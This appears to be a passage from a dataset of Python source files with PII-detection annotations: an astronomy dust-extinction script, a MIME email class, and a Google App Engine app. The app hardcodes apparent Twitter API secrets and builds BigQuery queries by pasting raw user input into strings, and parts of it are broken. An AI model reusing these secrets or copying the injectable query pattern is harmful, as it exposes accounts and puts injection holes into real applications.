",21669,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['NRP', 'django.core'], ['PERSON', 'DTDForbidden'], ['LOCATION', 'DecimalData'], ['LOCATION', 'FKData'], ['LOCATION', 'ProxyBaseModel'], ['PERSON', ""data['right""], ['NRP', ""data['extra""], ['PERSON', 'type(instance.data'], ['PERSON', 'type(instance.data'], ['LOCATION', 'generic_compare(testcase'], ['LOCATION', 'fk_compare(testcase'], ['LOCATION', 'o2o_compare(testcase'], ['LOCATION', 'pk_compare(testcase'], ['PERSON', 'm2m_obj'], ['LOCATION', 'inherited_obj'], ['PERSON', '\\xa5'], ['DATE_TIME', '20'], ['DATE_TIME', '21'], ['DATE_TIME', '30'], ['DATE_TIME', '31'], ['DATE_TIME', '40'], ['DATE_TIME', '41'], ['DATE_TIME', '42'], ['DATE_TIME', '50'], ['DATE_TIME', '51'], ['DATE_TIME', '52'], ['DATE_TIME', '60'], ['DATE_TIME', '61'], ['DATE_TIME', '62'], ['DATE_TIME', '70'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '71'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '72'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '73'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '74'], ['DATE_TIME', '75'], ['DATE_TIME', '76'], ['DATE_TIME', '77'], ['DATE_TIME', '80'], ['DATE_TIME', '123456789'], ['DATE_TIME', '81'], ['DATE_TIME', '82'], ['DATE_TIME', '83'], ['DATE_TIME', '90'], ['DATE_TIME', '91'], ['DATE_TIME', '95'], ['DATE_TIME', '96'], ['DATE_TIME', '101'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['PERSON', 'tag3'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '410'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '440'], ['LOCATION', 'm2m_obj'], ['LOCATION', '441'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '443'], ['LOCATION', 'm2m_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['DATE_TIME', '123456789'], ['LOCATION', '751'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['DATE_TIME', '1100'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['PERSON', ""next(serializers.deserialize('xml""], ['URL', 'http://example.com/example.dtd""'], ['URL', 'django.co'], ['URL', 'django.core.se'], ['URL', 'django.core.serializers.ba'], ['URL', 'django.core.se'], ['URL', 'django.ht'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'instance.tags.cr'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'meta.parents.it'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'obj.id'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'data.it'], ['URL', 'testcase.as'], ['URL', 'six.me'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'connection.features.int'], ['URL', 'meta.ge'], ['URL', 'connection.features.al'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'cm.exception.ar'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'BaseModel.objects.cr'], ['URL', 'BaseModel.objects.al'], ['URL', 'ProxyBaseModel.objects.al'], ['URL', 'ProxyProxyBaseModel.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'Tag.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'connection.ve'], ['URL', 'six.PY'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'obj.sa'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'obj.sa'], ['URL', 'six.St'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'six.St'], ['URL', 'self.as'], ['URL', 'stream.ge'], ['URL', 'self.as'], ['URL', 'stream.content.de'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de']]"
43,"import threading
def ebv_list(list_submit,list_dict,i,ppid):
import os
lineindex = 0
timehold = time.time()
list_out = []
out = open('/tmp/tmpf_' + str(i) + '_' + str(ppid),'w')
for line in list_submit:
tt = re.split('\s+',line)
ra = float(tt[0])
dec = float(tt[1])
EBV = calc_EBV(float(ra),float(dec),i)
list_out.append(EBV)
#print EBV
lineindex += 1
out.write(str(EBV) + '\n')
if lineindex % 100 == 0:
print 'thread ' + str(i), lineindex, len(list_submit), time.time() - timehold
timehold = time.time()
list_dict[str(i)]['list_out'] = list_out
out.close()
def calc_EBV(coord_in_ra,coord_in_dec,i):
#coord_in_ra='12:51:26.28'
#coord_in_dec='27:07:42.'
coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch='2000') # input needs to be in HOURS as a STRING
g = Galactic(coord, epoch='2000') # output is in degrees not hours--it's latitude/longitude
spt = re.split('\:',str(g.lat))
#print spt, abs(float(spt[0])), float(spt[1])/60.
gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallat
#print g.long
spt = re.split('\:',str(g.long))
#print spt
gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallong
#coordtest = Equatorial(Galactic(g.long,g.lat, epoch='2000'), epoch='2000')
output = commands.getoutput('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y PI:KEY' + str(i) )
spt = re.split('\s',output)
#print spt
EBV = spt[-1]
#print EBV, float(coord_in_ra), float(coord_in_dec)
return EBV
class MyThread ( threading.Thread ):
def __init__ ( self, list_submit,list_dict, i, ppid):
self.i = i
self.list_submit = list_submit
self.list_dict = list_dict
self.ppid = ppid
threading.Thread.__init__(self)
def run ( self ):
ebv_list(self.list_submit,list_dict,self.i,self.ppid)
return
#add E(B-V) to ldac table
import re, commands, sys, bashreader, os
from ephem import *
dict = bashreader.parseFile('progs.ini')
table = sys.argv[1]
import time
tempfile = '/tmp/outkey'
ebvfile = '/tmp/outebv'
os.system('rm ' + ebvfile)
ppid = os.getppid()
print ppid
command = ""ldactoasc -b -i "" + table + "" -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > "" + ebvfile
print command
os.system(command)
list = []
import re
outkey=open(tempfile,'w')
lines = open(ebvfile,'r').readlines()
number_interval = 4
length_int = len(lines)/number_interval
start = 0
my_threads = []
list_dict = {}
for i in range(number_interval):
end = start + length_int
if i + 1 == number_interval:
list_submit = lines[start:]
else:
list_submit = lines[start:end]
start = end
list_dict[str(i)] = {'list_submit':list_submit}
#s = MyThread(list_submit,list_dict,i,ppid)
#stat = os.fork()
print i, 'started'
s = os.fork()
if not s:
ebv_list(list_submit,list_dict,i,ppid)
sys.exit()
#s.start()
my_threads.append(s)
print my_threads
#print threading.enumerate()
for s in my_threads:
os.waitpid(s,0)
print 'done'
list_out = []
for i in range(number_interval):
list_out = list_out + list_dict[str(i)]['list_out']
print len(lines), len(list_out)
print lines[0:2], list_out[0:2]
# READ IN COLUMN INFO
for val in list_out:
outkey.write(str(val) + '\n')
outkey.close()
command = ""asctoldac -i "" + tempfile + "" -o "" + tempfile + "".cat -c "" + dict['photconf'] + ""/EBV.conf -t OBJECTS ""
os.system(command)
command = ""ldacjoinkey -o test -i "" + table + "" -p "" + tempfile + "".cat -t OBJECTS -k EBV""
os.system(command)
",3755,"[['PERSON', 'timehold'], ['PERSON', 'ra = float(tt[0'], ['PERSON', 'timehold'], ['LOCATION', 'Equatorial'], ['PERSON', 'gallat'], ['PERSON', 'gallong = float(spt[0'], ['PERSON', 'MyThread'], ['PERSON', 'self.list_dict = list_dict'], ['LOCATION', 'self.i'], ['URL', 'out.cl'], ['URL', 'g.la'], ['URL', 'g.la'], ['URL', 'commands.ge'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'bashreader.pa'], ['URL', 'progs.in'], ['URL', 'sys.ar'], ['URL', 'os.sy'], ['URL', 'os.ge'], ['URL', 'os.sy'], ['URL', 'os.fo'], ['URL', 'os.fo'], ['URL', 's.st'], ['URL', 'outkey.cl'], ['URL', 'EBV.co'], ['URL', 'os.sy'], ['URL', 'os.sy']]"
44,"#coding=utf-8
import smtplib
from datetime import datetime
from hashlib import md5
import sys, re
from .misc import *
from .parts import *
from collections import OrderedDict as odict
class Mimemail():
def __init__(self, **kwargs):
self.headers = odict()
self.headers['MIME-Version'] = '1.0'
self.headers['From'] = MM_DEFAULT_FROM
self.headers['Date'] = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
self.body = ''
self.html = None
self.text = None
self.images = []
self.attachments = []
self.charset = 'UTF-8'
self.recipients = {}
self.from_email = 'root@localhost'
self.kw = kwargs
def set_from(self, from_email, from_name):
self.headers['From'] = '%s <%s>' % (encode_header(from_name, self.charset), from_email)
self.from_email = from_email
def set_html(self, html):
self.html = html
def set_text(self, text):
self.text = text
def add_image(self, image):
self.images.append(image)
def add_attachment(self, att):
self.attachments.append(att)
def set_subject(self, subject):
self.subject = subject
def create_images_part(self, boundary):
lines = []
for image in self.images:
lines.extend([
MM_DEFAULT_CRLF,
'--%s%s' % (boundary, MM_DEFAULT_CRLF),
image.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
image.get_part_body()
])
return ''.join(lines)
def create_attachments_part(self, boundary):
lines = []
for att in self.attachments:
lines.extend([
MM_DEFAULT_CRLF,
'--%s%s' % (boundary, MM_DEFAULT_CRLF),
att.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
att.get_part_body()
])
return ''.join(lines)
def build(self):
has_html = self.html != None
has_text = self.text != None
has_img = len(self.images) > 0
has_att = len(self.attachments) > 0
if has_text and not has_html:
self.html = MimemailPartHtml(re.sub(r'\n', ' ', self.text.plain_content, re.M | re.S), charset = self.charset)
elif has_html and not has_text:
self.text = MimemailPartText(re.sub(r'<|>|/', '', self.html.plain_content, re.M | re.S | re.U), charset = self.charset)
elif not has_html and not has_text and not has_att:
raise MimemailException('An email has no content to send')
if has_img:
for image in self.images:
src = image.get_file_path()
dst = 'cid:' + image.get_image_cid()
self.html.plain_content = self.html.plain_content.replace(os.path.basename(src), dst)
boundary = 'alt_' + gen_boundary_hash()
self.headers['Content-Type'] = 'multipart/alternative; boundary=""' + boundary + '""'
self.body = ''.join([
'--%s%s' % ( boundary, MM_DEFAULT_CRLF ),
self.text.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
self.text.get_part_body(),
'%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF ),
self.html.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
self.html.get_part_body(),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
if has_img:
boundary = 'rel_' + gen_boundary_hash()
self.body = ''.join([
'--%s%s' % ( boundary, MM_DEFAULT_CRLF ),
'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),
self.body,
self.create_images_part(boundary),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
self.headers['Content-Type'] = 'multipart/related; boundary=""%s""' % (boundary)
if has_att:
boundary = 'att_' + gen_boundary_hash()
self.body = ''.join([
'--%s%s' % (boundary, MM_DEFAULT_CRLF ),
'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),
self.body,
self.create_attachments_part(boundary),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
self.headers['Content-Type'] = 'multipart/mixed; boundary=""%s""' % (boundary)
self.headers['Message-ID'] = self.gen_message_id()
if hasattr(self, 'subject'):
self.headers['Subject'] = encode_header(self.subject, self.charset)
def gen_message_id(self):
return '<%s.%08x@%s>' % (datetime.datetime.now().strftime('%Y%m%d%H%M%S'), random.randint(0, sys.maxint), self.kw.get('host', 'localhost'))
def add_recipient(self, email, name = None):
self.recipients[email] = name if name else email
def send(self):
self.build()
extra_headers = self.get_extra_headers()
for email, name in self.recipients.iteritems():
message = '%s%sTo: %s <%s>%s%s%s' % (extra_headers, MM_DEFAULT_CRLF, encode_header(name, self.charset), email, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF, self.body)
s = smtplib.SMTP(self.kw.get('smtp_relay', '127.0.0.1'))
s.sendmail(self.from_email, email, message)
s.quit()
def get_extra_headers(self):
return MM_DEFAULT_CRLF.join([ '%s: %s' % (k, v) for k,v in self.headers.iteritems() ])
",5966,"[['PERSON', 'OrderedDict'], ['PERSON', 'odict'], ['PERSON', 'odict'], ['LOCATION', 'set_from(self'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'self.bo'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.fr'], ['URL', 'self.kw'], ['URL', 'self.ch'], ['URL', 'self.fr'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.su'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.at'], ['URL', 'att.ge'], ['URL', 'att.ge'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ht'], ['URL', 're.su'], ['URL', 'self.text.pl'], ['URL', 'self.ch'], ['URL', 're.su'], ['URL', 'self.html.pl'], ['URL', 'self.ch'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.html.pl'], ['URL', 'self.html.pl'], ['URL', 'content.re'], ['URL', 'os.path.ba'], ['URL', 'self.bo'], ['URL', 'self.text.ge'], ['URL', 'self.text.ge'], ['URL', 'self.html.ge'], ['URL', 'self.html.ge'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.ge'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'datetime.datetime.no'], ['URL', 'sys.ma'], ['URL', 'self.kw.ge'], ['URL', 'self.re'], ['URL', 'self.ge'], ['URL', 'self.recipients.it'], ['URL', 'self.ch'], ['URL', 'self.bo'], ['URL', 'smtplib.SM'], ['URL', 'self.kw.ge'], ['URL', 's.se'], ['URL', 'self.fr'], ['URL', 'CRLF.jo'], ['URL', 'self.headers.it']]"
45,"__author__ = dummy@email.com (J. Matthew Landis)'
import os
import logging
import pickle
import webapp2
import time
import httplib2
import json
import tweepy
import haigha
from collections import Counter
from haigha.connections.rabbit_connection import RabbitConnection
from apiclient import discovery
from oauth2client import appengine
from oauth2client import client
from google.appengine.api import memcache
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.ext.webapp import template
#######################################################################
PROJECTID = '934763316754'
CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json')
# Helpful message to display in the browser if the CLIENT_SECRETS file
# is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """"""""""
Warning: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
.
with information found on the APIs Console .
"""""" % CLIENT_SECRETS
http = httplib2.Http(memcache)
service = discovery.build(""plus"", ""v1"", http=http)
bigquery_service = discovery.build(""bigquery"",""v2"", http=http)
consumer_key = ""9xNrmD6hE0xnRSYdZt5t0XT0B""
consumer_secret = ""kperqjklvPhBCVvHI96aZIfJu5w1DHI2BZoNMdBEvBPfmuZIYG""
access_token = ""46501499-cijYvv9ixtQKHLSiLt9QaRtcmWeEKvvGZK5s6ukw7""
access_token_secret = ""D127XCAN02BPb0ZtcreCG6dpBJyiiLCeD6ckS2MgdHqwG""
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/plus.me',
message=MISSING_CLIENT_SECRETS_MESSAGE)
bq_decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/bigquery',
message=MISSING_CLIENT_SECRETS_MESSAGE)
## Function to retrieve and render a template
def render_template(handler, templatename, templatevalues):
path = os.path.join(os.path.dirname(__file__), 'templates/' + templatename)
html = template.render(path, templatevalues)
handler.response.out.write(html)
#######################################################################
## Handles and loads index page
class MainPage(webapp2.RequestHandler):
def get(self):
nickname = ""null""
email = ""null""
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
nickname = ui.fname+ "" "" +ui.lname
email = user.email()
login = users.create_login_url('/')
else:
nickname = user.nickname()
email = user.email()
login = '/createProfile'
else:
ui = None
login = users.create_login_url('/')
logout = users.create_logout_url('/')
os.system(""python stream.py"")
template_values = {
'login': login,
'logout': logout,
'user': user,
'nickname': nickname,
'email': email
}
render_template(self, 'index.html', template_values)
#######################################################################
## Handle user info and profile
class CreateProfile(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
self.redirect('/profile')
else:
template_data = {'logout':users.create_logout_url('/'), 'nickname': users.nickname()}
template_path = 'templates/createProfile.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(user.create_login_url('/'))
#######################################################################
## process user profile
## check for user signed in, if so, save the entered information, otherwise, redirect them to the login page
class ProcessUser(webapp2.RequestHandler) :
def post(self) :
user = users.get_current_user()
if user:
fname = self.request.get('fname')
lname = self.request.get('lname')
fname.replace("" "", """")
lname.replace("" "", """")
words = self.request.get_all('word')
if (not(not fname)) & (not(not lname)):
NewUser = UserModel()
NewUser.uid = user.user_id()
NewUser.fname = fname
NewUser.lname = lname
NewUser.words = []
for word in words:
word.replace("" "", """")
if word:
NewUser.words+=[word]
NewUser.put()
self.redirect('/profile')
else:
self.redirect('/createProfile')
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Model Data
class DataHandler(webapp2.RequestHandler) :
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get(""inputData"")
queryData = {'query':'SELECT SUM(word_count) as WCount,corpus_date,group_concat(corpus) as Work FROM '
'[publicdata:samples.shakespeare] WHERE word=""'+inputData+'"" and corpus_date>0 GROUP BY corpus_date ORDER BY WCount'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
resp = []
if 'rows' in dataList:
#parse dataList
for row in dataList['rows']:
for key,dict_list in row.iteritems():
count = dict_list[0]
year = dict_list[1]
corpus = dict_list[2]
resp.append({'count': count['v'],'year':year['v'],'corpus':corpus['v']})
else:
resp.append({'count':'0','year':'0','corpus':'0'})
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error':'No credentials'}))
#######################################################################
## Model Words
class WordsHandler(webapp2.RequestHandler) :
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get(""inputData"")
queryData = {'query':'SELECT text FROM '
'[doctor-know:rtda.tweets] WHERE Words CONTAINS ""'+inputData+'""GROUP BY text ORDER BY text LIMIT 150'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
resp = {}
resp['text'] = status.text
resp['created_at'] = time.mktime(status.created_at.timetuple())
resp['geo'] = status.geo
resp['source'] = status.source
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error':'No credentials'}))
#######################################################################
## Model Words
class WordsHandler(webapp2.RequestHandler) :
inputData = ""yes""
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get(""inputData"")
queryData = {'query':'SELECT text FROM '
'[doctor-know:rtda.tweets] WHERE text CONTAINS ""'+inputData+'"" GROUP BY text ORDER BY text LIMIT 300'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
tweets = []
if 'rows' in dataList:
#parse dataList
count = 0
for row in dataList['rows']:
for key,dict_list in row.iteritems():
tweet = dict_list[0]
count += 1
tweets.append({'text': tweet})
if count == 300:
break
ignore_words = [ ""fuck"", ""shit"", ""cock"", ""penis"", ""porn""]
words = []
for tweet in tweets:
tt = tweet.get('text', """")
for word in tt.split():
if ""http"" in word:
continue
if word not in ignore_words:
words.append(word)
resp = Counter(words)
resp.headers.add('Access-Control-Allow-Origin', ""*"")
return resp
# self.response.headers['Content-Type'] = 'application/json'
# self.response.out.write(json.dumps(tweets))
# else:
# self.response.write(json.dumps({'error':'No credentials'}))
#######################################################################
## Profile Page
class ProfilePage(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'firstname': ui.fname, 'lastname': ui.lname, 'words': ui.words, 'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/profile.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect('/createProfile')
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Artificial Creativity Engine
class DisplayEngine(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/engine.html'
self.response.out.write(template.render(template_path,template_data))
else:
template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')}
template_path = 'templates/engine.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Data Analysis
class DisplayData(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/data.html'
self.response.out.write(template.render(template_path,template_data))
else:
template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')}
template_path = 'templates/data.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Establish/Update User Profile
class UserModel(ndb.Model) :
uid = ndb.StringProperty(indexed=True)
fname = ndb.StringProperty(indexed = False)
lname = ndb.StringProperty(indexed = False)
words = ndb.StringProperty(indexed=False,repeated=True)
#######################################################################
## Establish/Update User Profile
# class CustomStreamListener(tweepy.StreamListener):
# def __init__(self, api):
# self.api = api
# super(tweepy.StreamListener, self).__init__()
# #setup rabbitMQ Connection
# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True)
# self.channel = self.connection.channel()
# #set max queue size
# args = {""x-max-length"": 2000}
# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args)
# def on_status(self, status):
# print status.text, ""\n""
# data = {}
# data['text'] = status.text
# data['created_at'] = time.mktime(status.created_at.timetuple())
# data['geo'] = status.geo
# data['source'] = status.source
# #queue the tweet
# self.channel.basic.publish(exchange='',
# routing_key='twitter_topic_feed',
# body=json.dumps(data))
# def on_error(self, status_code):
# print >> sys.stderr, 'Encountered error with status code:', status_code
# return True # Don't kill the stream
# def on_timeout(self):
# print >> sys.stderr, 'Timeout...'
# return True # Don't kill the stream
# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))
# # my keyword today is chelsea as the team just had a big win
# sapi.filter(track=[self.request.get(""inputData"")])
#######################################################################
## Establish/Update User Profile
# class CustomStreamListener(tweepy.StreamListener):
# def __init__(self, api):
# self.api = api
# super(tweepy.StreamListener, self).__init__()
# #setup rabbitMQ Connection
# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True)
# self.channel = self.connection.channel()
# #set max queue size
# args = {""x-max-length"": 2000}
# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args)
# def on_status(self, status):
# print status.text, ""\n""
# data = {}
# data['text'] = status.text
# data['created_at'] = time.mktime(status.created_at.timetuple())
# data['geo'] = status.geo
# data['source'] = status.source
# #queue the tweet
# self.channel.basic.publish(exchange='',
# routing_key='twitter_topic_feed',
# body=json.dumps(data))
# def on_error(self, status_code):
# print >> sys.stderr, 'Encountered error with status code:', status_code
# return True # Don't kill the stream
# def on_timeout(self):
# print >> sys.stderr, 'Timeout...'
# return True # Don't kill the stream
# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))
# # my keyword today is chelsea as the team just had a big win
# sapi.filter(track=[self.request.get(""inputData"")])
app = webapp2.WSGIApplication( [
('/', MainPage),
('/profile', ProfilePage),
('/createProfile', CreateProfile),
('/userRegister', ProcessUser),
('/getData', DataHandler),
('/getWords', WordsHandler),
('/data', DisplayData),
('/engine', DisplayEngine),
(decorator.callback_path, decorator.callback_handler()),
(bq_decorator.callback_path, bq_decorator.callback_handler())
], debug=True)
